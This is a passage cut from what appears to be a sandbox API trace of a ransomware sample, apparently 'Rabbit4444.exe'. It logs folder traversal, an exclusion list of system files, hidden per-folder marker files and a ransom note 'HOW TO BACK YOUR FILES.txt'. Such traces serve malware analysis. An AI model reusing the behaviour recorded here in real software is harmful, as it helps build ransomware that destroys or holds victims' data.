nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102850 [0054.419] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.419] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.419] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0054.419] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.419] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x523a5f8d, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5ee23d84, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xe9c18a44, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.419] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.419] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.419] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0054.419] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.419] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.419] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9c18a44, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9c18a44, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9c18a44, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.419] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.419] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.419] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x525e22af, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x525e22af, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x525e22af, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="all", cAlternateFileName="")) returned 1 [0054.419] lstrcmpiW (lpString1="all", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.419] lstrcmpiW (lpString1="all", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.419] lstrcmpiW (lpString1="all", lpString2="Rabbit4444.exe") returned -1 [0054.419] lstrcmpiW (lpString1="all", lpString2=".") returned 1 [0054.419] lstrcmpiW (lpString1="all", lpString2="..") returned 1 [0054.419] lstrcmpiW (lpString1="all", lpString2="windows") returned -1 [0054.419] lstrcmpiW (lpString1="all", lpString2="bootmgr") returned -1 [0054.419] lstrcmpiW (lpString1="all", lpString2="pagefile.sys") returned -1 [0054.419] lstrcmpiW (lpString1="all", lpString2="boot") returned -1 [0054.419] lstrcmpiW (lpString1="all", lpString2="ids.txt") returned -1 [0054.419] lstrcmpiW (lpString1="all", lpString2="NTUSER.DAT") returned -1 [0054.420] lstrcpyW (in: lpString1=0x130ebf0, lpString2="all" | out: lpString1="all") returned="all" [0054.420] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6388 [0054.420] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc0) returned 0x10a2f0 [0054.420] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6390 | out: ListHead=0xf68b0, ListEntry=0xf6390) returned 0xf6670 [0054.420] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x59d60336, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x59d60336, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x59d60336, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="de_CH", cAlternateFileName="")) returned 1 [0054.420] lstrcmpiW (lpString1="de_CH", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.420] lstrcmpiW (lpString1="de_CH", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.420] lstrcmpiW (lpString1="de_CH", lpString2="Rabbit4444.exe") returned -1 [0054.420] lstrcmpiW (lpString1="de_CH", lpString2=".") returned 1 [0054.420] lstrcmpiW (lpString1="de_CH", lpString2="..") returned 1 [0054.420] lstrcmpiW (lpString1="de_CH", lpString2="windows") returned -1 [0054.420] lstrcmpiW (lpString1="de_CH", lpString2="bootmgr") returned 1 [0054.420] lstrcmpiW (lpString1="de_CH", lpString2="pagefile.sys") returned -1 [0054.420] lstrcmpiW (lpString1="de_CH", lpString2="boot") returned 1 [0054.420] lstrcmpiW (lpString1="de_CH", lpString2="ids.txt") returned -1 [0054.420] lstrcmpiW (lpString1="de_CH", lpString2="NTUSER.DAT") returned -1 [0054.420] lstrcpyW (in: lpString1=0x130ebf0, lpString2="de_CH" | out: lpString1="de_CH") returned="de_CH" [0054.420] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6348 [0054.420] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc4) returned 0x1161e0 [0054.420] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6350 | out: ListHead=0xf68b0, ListEntry=0xf6350) returned 0xf6390 [0054.420] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5a224c46, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5a224c46, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x5a224c46, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="de_DE", cAlternateFileName="")) returned 1 [0054.420] lstrcmpiW (lpString1="de_DE", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.420] lstrcmpiW (lpString1="de_DE", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.420] lstrcmpiW (lpString1="de_DE", lpString2="Rabbit4444.exe") returned -1 [0054.420] lstrcmpiW (lpString1="de_DE", lpString2=".") returned 1 [0054.420] lstrcmpiW (lpString1="de_DE", lpString2="..") returned 1 [0054.420] lstrcmpiW (lpString1="de_DE", lpString2="windows") returned -1 [0054.420] lstrcmpiW (lpString1="de_DE", lpString2="bootmgr") returned 1 [0054.420] lstrcmpiW (lpString1="de_DE", lpString2="pagefile.sys") returned -1 [0054.420] lstrcmpiW (lpString1="de_DE", lpString2="boot") returned 1 [0054.420] lstrcmpiW (lpString1="de_DE", lpString2="ids.txt") returned -1 [0054.420] lstrcmpiW (lpString1="de_DE", lpString2="NTUSER.DAT") returned -1 [0054.420] lstrcpyW (in: lpString1=0x130ebf0, lpString2="de_DE" | out: lpString1="de_DE") returned="de_DE" [0054.420] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6368 [0054.420] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc4) returned 0x116930 [0054.420] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6370 | out: ListHead=0xf68b0, ListEntry=0xf6370) returned 0xf6350 [0054.420] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5ad2ba77, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5ad2ba77, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x5ad2ba77, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en_CA", cAlternateFileName="")) returned 1 [0054.421] lstrcmpiW (lpString1="en_CA", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.421] lstrcmpiW (lpString1="en_CA", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.421] lstrcmpiW (lpString1="en_CA", lpString2="Rabbit4444.exe") returned -1 [0054.421] lstrcmpiW (lpString1="en_CA", lpString2=".") returned 1 [0054.421] lstrcmpiW (lpString1="en_CA", lpString2="..") returned 1 [0054.421] lstrcmpiW (lpString1="en_CA", lpString2="windows") returned -1 [0054.421] lstrcmpiW (lpString1="en_CA", lpString2="bootmgr") returned 1 [0054.421] lstrcmpiW (lpString1="en_CA", lpString2="pagefile.sys") returned -1 [0054.421] lstrcmpiW (lpString1="en_CA", lpString2="boot") returned 1 [0054.421] lstrcmpiW (lpString1="en_CA", lpString2="ids.txt") returned -1 [0054.421] lstrcmpiW (lpString1="en_CA", lpString2="NTUSER.DAT") returned -1 [0054.421] lstrcpyW (in: lpString1=0x130ebf0, lpString2="en_CA" | out: lpString1="en_CA") returned="en_CA" [0054.421] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf63e8 [0054.421] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc4) returned 0x1165f0 [0054.421] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf63f0 | out: ListHead=0xf68b0, ListEntry=0xf63f0) returned 0xf6370 [0054.421] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5e074d37, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5e074d37, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x5e074d37, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en_GB", cAlternateFileName="")) returned 1 [0054.421] lstrcmpiW (lpString1="en_GB", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.421] lstrcmpiW (lpString1="en_GB", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.421] lstrcmpiW (lpString1="en_GB", lpString2="Rabbit4444.exe") returned -1 [0054.421] lstrcmpiW (lpString1="en_GB", lpString2=".") returned 1 [0054.421] lstrcmpiW (lpString1="en_GB", lpString2="..") returned 1 [0054.421] lstrcmpiW (lpString1="en_GB", lpString2="windows") returned -1 [0054.421] lstrcmpiW (lpString1="en_GB", lpString2="bootmgr") returned 1 [0054.421] lstrcmpiW (lpString1="en_GB", lpString2="pagefile.sys") returned -1 [0054.421] lstrcmpiW (lpString1="en_GB", lpString2="boot") returned 1 [0054.421] lstrcmpiW (lpString1="en_GB", lpString2="ids.txt") returned -1 [0054.421] lstrcmpiW (lpString1="en_GB", lpString2="NTUSER.DAT") returned -1 [0054.421] lstrcpyW (in: lpString1=0x130ebf0, lpString2="en_GB" | out: lpString1="en_GB") returned="en_GB" [0054.421] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6588 [0054.421] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc4) returned 0x116380 [0054.421] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6590 | out: ListHead=0xf68b0, ListEntry=0xf6590) returned 0xf63f0 [0054.421] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5e98a62e, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5e98a62e, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x5e98a62e, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en_US", cAlternateFileName="")) returned 1 [0054.422] lstrcmpiW (lpString1="en_US", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.422] lstrcmpiW (lpString1="en_US", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.422] lstrcmpiW (lpString1="en_US", lpString2="Rabbit4444.exe") returned -1 [0054.422] lstrcmpiW (lpString1="en_US", lpString2=".") returned 1 [0054.422] lstrcmpiW (lpString1="en_US", lpString2="..") returned 1 [0054.422] lstrcmpiW (lpString1="en_US", lpString2="windows") returned -1 [0054.422] lstrcmpiW (lpString1="en_US", lpString2="bootmgr") returned 1 [0054.422] lstrcmpiW (lpString1="en_US", lpString2="pagefile.sys") returned -1 [0054.422] lstrcmpiW (lpString1="en_US", lpString2="boot") returned 1 [0054.422] lstrcmpiW (lpString1="en_US", lpString2="ids.txt") returned -1 [0054.422] lstrcmpiW (lpString1="en_US", lpString2="NTUSER.DAT") returned -1 [0054.422] lstrcpyW (in: lpString1=0x130ebf0, lpString2="en_US" | out: lpString1="en_US") returned="en_US" [0054.422] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf63a8 [0054.422] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc4) returned 0x116860 [0054.422] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf63b0 | out: ListHead=0xf68b0, ListEntry=0xf63b0) returned 0xf6590 [0054.422] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5ee23d84, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5ee23d84, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x5ee23d84, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nl_NL", cAlternateFileName="")) returned 1 [0054.422] lstrcmpiW (lpString1="nl_NL", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0054.422] lstrcmpiW (lpString1="nl_NL", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.422] lstrcmpiW (lpString1="nl_NL", lpString2="Rabbit4444.exe") returned -1 [0054.422] lstrcmpiW (lpString1="nl_NL", lpString2=".") returned 1 [0054.422] lstrcmpiW (lpString1="nl_NL", lpString2="..") returned 1 [0054.422] lstrcmpiW (lpString1="nl_NL", lpString2="windows") returned -1 [0054.422] lstrcmpiW (lpString1="nl_NL", lpString2="bootmgr") returned 1 [0054.422] lstrcmpiW (lpString1="nl_NL", lpString2="pagefile.sys") returned -1 [0054.422] lstrcmpiW (lpString1="nl_NL", lpString2="boot") returned 1 [0054.422] lstrcmpiW (lpString1="nl_NL", lpString2="ids.txt") returned 1 [0054.422] lstrcmpiW (lpString1="nl_NL", lpString2="NTUSER.DAT") returned -1 [0054.422] lstrcpyW (in: lpString1=0x130ebf0, lpString2="nl_NL" | out: lpString1="nl_NL") returned="nl_NL" [0054.422] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6408 [0054.422] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc4) returned 0x116520 [0054.422] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6410 | out: ListHead=0xf68b0, ListEntry=0xf6410) returned 0xf63b0 [0054.422] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5ee23d84, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5ee23d84, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x5ee23d84, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nl_NL", cAlternateFileName="")) returned 0 [0054.422] FindClose (in: hFindFile=0x102850 | out: hFindFile=0x102850) returned 1 [0054.423] lstrcpyW (in: lpString1=0x130ebf0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.423] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\adobe\\linguistics\\userdictionaries\\adobe custom dictionary\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0054.423] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0054.423] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0054.423] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.423] CloseHandle (hObject=0x278) returned 1 [0054.423] CloseHandle (hObject=0x27c) returned 1 [0054.423] GetCurrentThreadId () returned 0xd98 [0054.423] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6410 [0054.423] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\nl_NL", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\nl_NL") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\nl_NL" [0054.423] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116520 | out: hHeap=0xe0000) returned 1 [0054.423] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6408 | out: hHeap=0xe0000) returned 1 [0054.424] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\nl_NL" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\nl_NL") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\nl_NL" [0054.424] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\nl_NL", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\nl_NL\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\nl_NL\\" [0054.424] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\nl_NL\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\nl_NL\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\nl_NL\\.BFC0E91B00AE8A0620D3" [0054.424] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\nl_NL\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\adobe\\linguistics\\userdictionaries\\adobe custom dictionary\\nl_nl\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0054.425] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0054.427] FlushFileBuffers (hFile=0x27c) returned 1 [0054.428] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\nl_NL\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.428] CloseHandle (hObject=0x27c) returned 1 [0054.429] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\nl_NL") returned 97 [0054.429] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.429] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\nl_NL\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5ee23d84, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5ee23d84, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xe9c3ecff, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0054.429] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.429] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.429] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0054.429] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.429] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5ee23d84, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5ee23d84, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xe9c3ecff, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.429] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.429] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.429] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0054.429] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.429] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.429] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9c3ecff, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9c3ecff, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9c3ecff, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.429] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.429] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.429] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9c3ecff, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9c3ecff, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9c3ecff, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0054.430] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0054.430] lstrcpyW (in: lpString1=0x130ebfc, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.430] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\nl_NL\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\adobe\\linguistics\\userdictionaries\\adobe custom dictionary\\nl_nl\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0054.430] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0054.430] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0054.430] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.430] CloseHandle (hObject=0x278) returned 1 [0054.430] CloseHandle (hObject=0x27c) returned 1 [0054.430] GetCurrentThreadId () returned 0xd98 [0054.431] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf63b0 [0054.431] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_US", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_US") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_US" [0054.431] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116860 | out: hHeap=0xe0000) returned 1 [0054.431] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf63a8 | out: hHeap=0xe0000) returned 1 [0054.431] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_US" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_US") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_US" [0054.431] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_US", lpString2="\\" | out: 